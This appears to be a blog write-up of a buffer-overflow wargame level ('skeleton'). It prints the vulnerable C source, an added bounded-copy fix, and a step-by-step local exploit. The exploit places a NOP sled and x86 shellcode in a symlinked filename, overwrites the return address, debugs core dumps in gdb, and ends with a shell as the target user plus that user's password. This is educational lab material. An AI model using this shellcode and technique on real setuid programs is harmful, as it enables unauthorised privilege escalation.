LEVEL10 (vampire -> skeleton) : argv hunter

Is "argv hunter" a problem about wiping argv..? Let's look at the code first.

[vampire@localhost .izayoi]$ cat skeleton.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>   /* memset, strlen, strcpy */

extern char **environ;

int main(int argc, char *argv[])
{
        char buffer[40];
        int i, saved_argc;

        if(argc < 2){
                printf("argv error\n");
                exit(0);
        }

        // egghunter
        for(i=0; environ[i]; i++)
                memset(environ[i], 0, strlen(environ[i]));

        if(argv[1][47] != '\xbf')
        {
                printf("stack is still your friend.\n");
                exit(0);
        }

        // check the length of argument
        if(strlen(argv[1]) > 48){
                printf("argument is too long!\n");
                exit(0);
        }

        // argc saver
        saved_argc = argc;

        strcpy(buffer, argv[1]);
        printf("%s\n", buffer);

        // shellcode hunter
        memset(buffer, 0, 40);

        // ultra argv hunter!
        for(i=0; i<saved_argc; i++)
                memset(argv[i], 0, strlen(argv[i]));
}


This time argv is wiped entirely, so the argv area we had been using all along can no longer be used at all.
Looking around for material, it turns out the program's filename is stored at the very end of the stack (a little before 0xbfffffff).
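The length test in skeleton.c accepts up to 48 bytes, but strcpy then writes them into a 40-byte buffer, which is the overflow this level is built on. As an added example that is not part of the wargame's code, here is the bounded copy the program is missing; copy_arg, original_check_is_insufficient and BUF_SIZE are names chosen for this illustration.

```c
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 40   /* same size as buffer[40] in skeleton.c */

/* Added example, not the wargame's code: a bounded replacement for the
 * strcpy(buffer, argv[1]) in skeleton.c. The original only rejects
 * strlen(argv[1]) > 48, so 41..48 bytes plus the terminator still run past
 * the 40-byte buffer into the saved frame pointer and return address. */

/* Copy arg into buf only if it fits together with its NUL terminator.
 * Returns 1 on success, 0 on rejection; on rejection buf is left empty
 * and no partial copy is made. */
int copy_arg(char *buf, size_t buf_size, const char *arg)
{
    size_t len = strlen(arg);
    if (len >= buf_size) {          /* len == buf_size leaves no room for NUL */
        buf[0] = '\0';
        return 0;
    }
    memcpy(buf, arg, len + 1);      /* length already validated, copy NUL too */
    return 1;
}

/* Mirrors the check in skeleton.c (strlen(argv[1]) > 48 is rejected) and
 * reports whether an argument that passes it would still overflow a
 * BUF_SIZE buffer, i.e. the gap the original check leaves open. */
int original_check_is_insufficient(const char *arg)
{
    size_t len = strlen(arg);
    return (len <= 48) && (len + 1 > BUF_SIZE);
}

int main(int argc, char *argv[])
{
    char buffer[BUF_SIZE];

    if (argc < 2) {
        printf("argv error\n");
        return 1;
    }
    if (!copy_arg(buffer, sizeof buffer, argv[1])) {
        printf("argument is too long!\n");
        return 1;
    }
    printf("%s\n", buffer);
    return 0;
}
```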

[vampire@localhost .izayoi]$ ls
aaaaaaaaa  core  skeleton  skeleton.c
[vampire@localhost .izayoi]$ ./aaaaaaaaa `perl -e 'print "\xbf"x48'`
¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿
Segmentation fault (core dumped)
[vampire@localhost .izayoi]$ gdb -c core -q
Core was generated by `                                                            '.
Program terminated with signal 11, Segmentation fault.
#0  0xbfbfbfbf in ?? ()
(gdb) x/70x $esp
...
0xbfffffe0:     0x00000000      0x00000000      0x00000000      0x00000000
0xbffffff0:     0x61612f2e      0x61616161      0x00616161      0x00000000
0xc0000000:     Cannot access memory at address 0xc0000000

So then, if I create a symbolic link again, put the shellcode into the filename, and put the address of that trailing region into ret, it should work.

[vampire@localhost .izayoi]$ ln -s skeleton `perl -e 'print "\x90"x100,"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'`
[vampire@localhost .izayoi]$ ls
core
skeleton
skeleton.c
????????????????????????????????????????????????????????????????????????????????????????????????????ë?^1ɱ2?l?ÿ??é?uöë?èêÿÿÿ2ÁQi00tii0cjo?äQT?â?±?Î?
[vampire@localhost .izayoi]$ ./`perl -e 'print "\x90"x100,"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'` `perl -e 'print "\xbf"x48'`
¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿
Segmentation fault (core dumped)
[vampire@localhost .izayoi]$ gdb -c core -q
Core was generated by `                                                                              '.
Program terminated with signal 11, Segmentation fault.
#0  0xbfbfbfbf in ?? ()
(gdb) x/70x 0xbfffff50
0xbfffff50:     0x00000000      0x00000000      0x00000000      0x00000000
0xbfffff60:     0x00000000      0x902f2e00      0x90909090      0x90909090
0xbfffff70:     0x90909090      0x90909090      0x90909090      0x90909090
0xbfffff80:     0x90909090      0x90909090      0x90909090      0x90909090
0xbfffff90:     0x90909090      0x90909090      0x90909090      0x90909090
0xbfffffa0:     0x90909090      0x90909090      0x90909090      0x90909090
0xbfffffb0:     0x90909090      0x90909090      0x90909090      0x90909090
0xbfffffc0:     0x90909090      0x90909090      0xeb909090      0xc9315e11
0xbfffffd0:     0x6c8032b1      0x8001ff0e      0xf67501e9      0xeae805eb
0xbfffffe0:     0x32ffffff      0x306951c1      0x69697430      0x6f6a6330
0xbffffff0:     0x5451e48a      0xb19ae28a      0x0081ce0c      0x00000000
0xc0000000:     Cannot access memory at address 0xc0000000

Create the symbolic link... check the location...

[vampire@localhost .izayoi]$ ln -s skeleton `perl -e 'print "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'`
[vampire@localhost .izayoi]$ ./`perl -e 'print "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'` `perl -e 'print "\xbf"x44,"\xd2\xff\xff\xbf"'`
¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿¿Òÿÿ¿
Segmentation fault (core dumped)
[vampire@localhost .izayoi]$ gdb -c core
GNU gdb 19991004
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux".
Core was generated by `                                                                              '.
Program terminated with signal 11, Segmentation fault.
#0  0xbfffffd2 in ?? ()
(gdb) x/70x 0xbfffffd2
0xbfffffd2:     0xff0e6c80      0x01e98001      0x05ebf675      0xffffeae8
0xbfffffe2:     0x51c132ff      0x74303069      0x63306969      0xe48a6f6a
0xbffffff2:     0xe28a5451      0xce0cb19a      0x00000081      Cannot access memory at address 0xbffffffe
(gdb)

I tried for a long time and it didn't work. I thought I had made a mistake, but when I checked where ret was pointing, it pointed at 0xbfffffd2.
Hmm... the 48-byte shellcode seems to be too long.

[vampire@localhost vampire]$ ln -s skeleton `perl -e 'print "\x90"x100,"\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3"'`
[vampire@localhost vampire]$ ./`perl -e 'print "\x90"x100,"\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3"'` `perl -e 'print "a"x44,"\xa0\xff\xff\xbf"'`
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa ÿÿ¿
bash$ id;my-pass
uid=509(vampire) gid=509(vampire) euid=510(skeleton) egid=510(skeleton) groups=509(vampire)
euid = 510
shellcoder

It worked with a different shellcode. I wanted to debug it and confirm why, but I couldn't verify it properly, so I ended the experiment there for now.

P.S. Addendum

http://devanix.tistory.com/145

The link above has a different solution to this problem.
It uses a shellcode based on the RTL (return-to-libc) technique, and there is a further detailed explanation at http://www.hackerschool.org/HS_Boards/data/Lib_system/rtl_sc.txt.

The way of solving this problem is the same, but since that post describes how the shellcode was written, I added the link.
Posted by john@memory